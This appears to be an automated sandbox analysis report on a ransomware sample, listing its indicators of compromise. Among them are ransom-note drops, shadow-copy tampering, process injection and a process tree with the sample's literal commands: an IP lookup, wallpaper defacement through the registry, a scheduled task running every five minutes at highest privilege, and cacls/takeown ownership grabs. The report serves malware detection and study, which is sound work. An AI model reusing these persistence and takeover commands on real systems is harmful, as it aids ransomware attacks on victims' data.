File opened (read-only)	\??\V:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\Q:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\H:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\B:	8Pk9qSFt64.exe
File opened (read-only)	\??\U:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\O:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\K:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\K:	8Pk9qSFt64.exe
File opened (read-only)	\??\X:	8Pk9qSFt64.exe
File opened (read-only)	\??\S:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\F:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\G:	8Pk9qSFt64.exe
File opened (read-only)	\??\J:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\G:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\A:	8Pk9qSFt64.exe
File opened (read-only)	\??\E:	8Pk9qSFt64.exe
File opened (read-only)	\??\J:	8Pk9qSFt64.exe
File opened (read-only)	\??\P:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\M:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\L:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\W:	8Pk9qSFt64.exe
File opened (read-only)	\??\Y:	8Pk9qSFt64.exe
File opened (read-only)	\??\E:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\M:	8Pk9qSFt64.exe
File opened (read-only)	\??\Q:	8Pk9qSFt64.exe
File opened (read-only)	\??\T:	8Pk9qSFt64.exe
File opened (read-only)	\??\U:	8Pk9qSFt64.exe
File opened (read-only)	\??\Y:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\X:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\W:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\R:	8Pk9qSFt64.exe
File opened (read-only)	\??\S:	8Pk9qSFt64.exe
File opened (read-only)	\??\N:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\I:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\H:	8Pk9qSFt64.exe
File opened (read-only)	\??\V:	8Pk9qSFt64.exe
File opened (read-only)	\??\T:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\F:	8Pk9qSFt64.exe
File opened (read-only)	\??\P:	8Pk9qSFt64.exe
File opened (read-only)	\??\N:	8Pk9qSFt64.exe
File opened (read-only)	\??\O:	8Pk9qSFt64.exe
File opened (read-only)	\??\R:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\I:	8Pk9qSFt64.exe
File opened (read-only)	\??\L:	8Pk9qSFt64.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\H5mnJKOJ.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\deploy.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jmc.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boa_Vista	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Thimphu	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Scoresbysund	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Guadalcanal	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\cs.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Gibraltar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\ja-JP\bckgRes.dll.mui	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pago_Pago	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Kathmandu	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\README.txt	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-annotations-common.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Nome	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkDrop32x32.gif	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Spades\de-DE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Mahjong\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\deploy\messages_es.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.password.template	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\flavormap.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\README.html	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Chihuahua	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
520	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
384	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1948	powershell.exe
1524	8Pk9qSFt64.exe
1524	8Pk9qSFt64.exe
1524	8Pk9qSFt64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
1524	8Pk9qSFt64.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	1524	8Pk9qSFt64.exe
Token: SeLoadDriverPrivilege	1524	8Pk9qSFt64.exe
Token: SeTakeOwnershipPrivilege	108	takeown.exe
Token: SeTakeOwnershipPrivilege	1676	takeown.exe
Token: SeTakeOwnershipPrivilege	1072	takeown.exe
Token: SeTakeOwnershipPrivilege	1276	takeown.exe
Token: SeBackupPrivilege	1736	vssvc.exe
Token: SeRestorePrivilege	1736	vssvc.exe
Token: SeAuditPrivilege	1736	vssvc.exe
Token: SeTakeOwnershipPrivilege	268	takeown.exe
Token: SeTakeOwnershipPrivilege	1756	takeown.exe
Token: SeTakeOwnershipPrivilege	1616	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1580 wrote to memory of 1920	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	28
PID 1580 wrote to memory of 1920	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	28
PID 1580 wrote to memory of 1920	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	28
PID 1580 wrote to memory of 1920	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	28
PID 1580 wrote to memory of 760	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	30
PID 1580 wrote to memory of 760	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	30
PID 1580 wrote to memory of 760	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	30
PID 1580 wrote to memory of 760	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	30
PID 1580 wrote to memory of 1632	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	32
PID 1580 wrote to memory of 1632	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	32
PID 1580 wrote to memory of 1632	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	32
PID 1580 wrote to memory of 1632	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	32
PID 1632 wrote to memory of 1948	1632	cmd.exe	34
PID 1632 wrote to memory of 1948	1632	cmd.exe	34
PID 1632 wrote to memory of 1948	1632	cmd.exe	34
PID 1632 wrote to memory of 1948	1632	cmd.exe	34
PID 1580 wrote to memory of 1452	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	37
PID 1580 wrote to memory of 1452	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	37
PID 1580 wrote to memory of 1452	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	37
PID 1580 wrote to memory of 1452	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	37
PID 1580 wrote to memory of 1072	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	39
PID 1580 wrote to memory of 1072	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	39
PID 1580 wrote to memory of 1072	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	39
PID 1580 wrote to memory of 1072	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	39
PID 1452 wrote to memory of 292	1452	cmd.exe	41
PID 1452 wrote to memory of 292	1452	cmd.exe	41
PID 1452 wrote to memory of 292	1452	cmd.exe	41
PID 1452 wrote to memory of 292	1452	cmd.exe	41
PID 1072 wrote to memory of 1880	1072	cmd.exe	42
PID 1072 wrote to memory of 1880	1072	cmd.exe	42
PID 1072 wrote to memory of 1880	1072	cmd.exe	42
PID 1072 wrote to memory of 1880	1072	cmd.exe	42
PID 1580 wrote to memory of 1836	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	43
PID 1580 wrote to memory of 1836	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	43
PID 1580 wrote to memory of 1836	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	43
PID 1580 wrote to memory of 1836	1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	43
PID 1452 wrote to memory of 1588	1452	cmd.exe	45
PID 1452 wrote to memory of 1588	1452	cmd.exe	45
PID 1452 wrote to memory of 1588	1452	cmd.exe	45
PID 1452 wrote to memory of 1588	1452	cmd.exe	45
PID 1452 wrote to memory of 1976	1452	cmd.exe	46
PID 1452 wrote to memory of 1976	1452	cmd.exe	46
PID 1452 wrote to memory of 1976	1452	cmd.exe	46
PID 1452 wrote to memory of 1976	1452	cmd.exe	46
PID 1836 wrote to memory of 1368	1836	cmd.exe	47
PID 1836 wrote to memory of 1368	1836	cmd.exe	47
PID 1836 wrote to memory of 1368	1836	cmd.exe	47
PID 1836 wrote to memory of 1368	1836	cmd.exe	47
PID 1836 wrote to memory of 1704	1836	cmd.exe	49
PID 1836 wrote to memory of 1704	1836	cmd.exe	49
PID 1836 wrote to memory of 1704	1836	cmd.exe	49
PID 1836 wrote to memory of 1704	1836	cmd.exe	49
PID 1836 wrote to memory of 1996	1836	cmd.exe	50
PID 1836 wrote to memory of 1996	1836	cmd.exe	50
PID 1836 wrote to memory of 1996	1836	cmd.exe	50
PID 1836 wrote to memory of 1996	1836	cmd.exe	50
PID 1996 wrote to memory of 1424	1996	cmd.exe	51
PID 1996 wrote to memory of 1424	1996	cmd.exe	51
PID 1996 wrote to memory of 1424	1996	cmd.exe	51
PID 1996 wrote to memory of 1424	1996	cmd.exe	51
PID 1424 wrote to memory of 1524	1424	8Pk9qSFt.exe	52
PID 1424 wrote to memory of 1524	1424	8Pk9qSFt.exe	52
PID 1424 wrote to memory of 1524	1424	8Pk9qSFt.exe	52
PID 1424 wrote to memory of 1524	1424	8Pk9qSFt.exe	52

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1580
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWbpVd9W.exe"
  2⤵
  PID:1920
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWbpVd9W.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWbpVd9W.exe" -n
  2⤵
  - Executes dropped EXE
  PID:760
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y81a2v1H.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1632
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\H5mnJKOJ.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1452
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\H5mnJKOJ.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:292
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:1976
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\jpMqGlzX.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1072
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\jpMqGlzX.vbs"
    3⤵
    PID:1880
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\iZwk4ceY.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      PID:1748
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\iZwk4ceY.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:520
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:1708
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:1384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\1k2tvAVA.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:1368
- - C:\Windows\SysWOW64\takeown.exe
